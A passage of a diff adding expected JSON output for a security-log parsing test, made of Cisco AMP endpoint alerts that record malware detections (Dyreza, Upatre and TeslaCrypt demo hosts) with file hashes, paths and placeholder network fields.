"2021-01-15T10:20:00.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f5:8f:96:c3:53:1c" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296279, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.cve": [ + "CVE-2015-7204" + ], + "cisco.amp.related.mac": [ + "f5:8f:96:c3:53:1c" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "cisco.amp.vulnerabilities": [ + { + "cve": "CVE-2015-7204", + "name": "Mozilla Firefox", + "score": "6.8", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204", + "version": "41.0" + } + ], + "event.action": "Vulnerable Application Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 15210587194928, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 1, + "event.start": "2021-01-15T10:20:00.000Z", + "file.hash.sha256": "4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f", + "file.name": "firefox.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Exploit_Prevention", + "host.name": "Demo_AMP_Exploit_Prevention", + "input.type": "log", + "log.offset": 55192, + "process.hash.sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894", + "related.hash": [ + "4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f" + ], + "related.hosts": [ + "Demo_AMP_Exploit_Prevention" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:19:59.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669409347600427", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 257000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533669409347600000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 56650, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:19:58.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669405052633129", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 847000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533669405052633000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 59295, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:18:58.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669147354595368", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 375000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533669147354595000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 60614, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:18:57.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669143059628070", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 968000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533669143059628000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 63259, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:18:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259286289612895", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 669000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176259286289613000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 64578, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:18:13.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259234750005342", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 657000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176259234750005000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 65897, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:18:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259183210397789", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 645000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176259183210398000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 67216, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:58.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e1:e5:94:ea:a5:44" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6180335966167760897", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e1:e5:94:ea:a5:44" + ], + "cisco.amp.timestamp_nanoseconds": 875000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6180335966167761000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b2e15a06b0cca8a926c94f8a8eae3d88", + "file.hash.sha1": "f9b02ad8d25157eebdb284631ff646316dc606d5", + "file.hash.sha256": "fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc", + "file.name": "Fax.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 68535, + "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", + "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "process.name": "explorer.exe", + "process.pid": 3164, + "related.hash": [ + "fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc", + "b2e15a06b0cca8a926c94f8a8eae3d88", + "f9b02ad8d25157eebdb284631ff646316dc606d5" + ], + "related.hosts": [ + "Demo_Upatre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:57.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668885361590309", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 672000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533668885361590000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 70133, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:50.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259135965757532", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 8000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176259135965757000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 74097, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:41.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.event_type_id": 1107296272, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 291000000, + "event.action": "Executed malware", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 1489955900291000600, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-15T10:17:41.000Z", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "input.type": "log", + "log.offset": 75414, + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6159251520740130915", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 3000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251520740131000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 76706, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:39.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6159251516445163618", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 988000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251516445164000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 78028, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6159251512150196266", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 942000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 152159, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259080131182683", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 996000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176259080131183000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + 